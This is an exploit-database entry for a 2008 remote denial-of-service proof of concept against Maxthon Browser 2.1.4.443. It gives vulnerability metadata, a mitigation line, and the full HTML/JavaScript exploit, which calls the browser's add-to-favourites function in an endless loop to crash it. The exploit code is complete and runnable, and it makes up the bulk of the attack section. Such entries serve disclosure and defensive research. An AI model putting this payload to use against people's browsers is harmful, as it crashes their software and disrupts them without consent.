Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

vendor:

Maxthon Browser

by:

Gjoko 'LiquidWorm' Krstic

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Maxthon Browser

Affected Version From: 2.1.4.443

Affected Version To: 2.1.4.443

Patch Exists: Yes

Related CWE: N/A

CPE: a:maxthon:maxthon_browser

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Maxthon Browser 2.1.4.443 is vulnerable to a remote denial of service attack. By exploiting a vulnerability in the browser, an attacker can cause the browser to crash. This is achieved by using a malicious JavaScript code which adds a malicious website to the browser's favorites list. This causes the browser to crash.

Mitigation:

Users should update to the latest version of Maxthon Browser to mitigate this vulnerability.

Source

Exploit-DB raw data:

<!--

 Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

 Summary: Maxthon Browser is a powerful tabbed browser built for
 all users. Besides basic browsing functionality, Maxthon Browser
 provides a rich set of features to improve your surfing experience.

 Product web page: http://www.maxthon.com

 by Gjoko 'LiquidWorm' Krstic

 liquidworm [t00t] gmail [d0t] com

 http://www.zeroscience.org

 09.09.2008

-->


<html>

<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</Title>

<head>

<body>

<script type="text/javascript">

alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");

function thricer()
{
	title="Attack";

	url="http://www.thrice.net/";

	if (window.sidebar)
	{
		window.sidebar.addPanel(title, url,"");
	} 
		
		else if( window.external )
		{
			window.external.AddFavorite( url, title);
		}
	
			else if(window.opera && window.print)
			{
				return (true);
			}
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true) 
{
	for (x=0; x<x+1; x++)

	thricer();
}

	else
	{
		alert("Allrighty Then!");

		window.location.href = "http://www.disneyland.com";
	}

</script>

</body>

</head>

</html>

# milw0rm.com [2008-09-11]